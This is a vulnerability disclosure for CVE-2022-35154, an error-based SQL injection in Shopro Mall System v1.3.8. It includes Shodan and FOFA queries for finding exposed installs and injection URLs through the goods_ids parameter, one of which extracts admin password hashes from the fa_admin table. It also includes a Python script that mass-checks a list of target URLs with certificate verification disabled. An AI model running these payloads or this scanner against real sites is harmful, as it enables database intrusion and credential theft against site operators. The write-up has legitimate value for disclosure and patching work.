Headline
CVE-2022-35154: secf0ra11.github.io/Shopro_SQL_injection.md at main · secf0ra11/secf0ra11.github.io
Shopro Mall System v1.3.8 was discovered to contain a SQL injection vulnerability via the value parameter.
Shopro Mall system V1.3.8 Value parameter has SQL injection****Shopro Mall system
Official Website:https://shopro.top Github:https://github.com/ITmonkey-cn/shopro.git
Search
shodan:http.title:"shopro" fofa:title="shopro"
Vulnerability Type
Error-Based SQL Injection
Vulnerability Version
V1.3.8
Recurring environment:
- ubuntu
- python3.7
Vulnerability Description AND recurrence
F12 find something interesting
parameter goods_ids has sql error message
http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
Find information whit Error-Based SQL Injection
http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
POC
import requests requests.packages.urllib3.disable_warnings() def poc(url): try: payload = "/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -" target = url + payload #print(url) header = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'} response = requests.get(target, headers=header, timeout=5,verify=False) #print(response.status_code) #print(response.text) if response.status_code == 500 and "XPATH" in response.text: print(url + " is vulnerable") except Exception as e: pass else: pass def main(): with open('url.txt',encoding='utf-8') as f: for i in f.readlines(): poc( i.strip()) f.close() if __name__ == '__main__': main()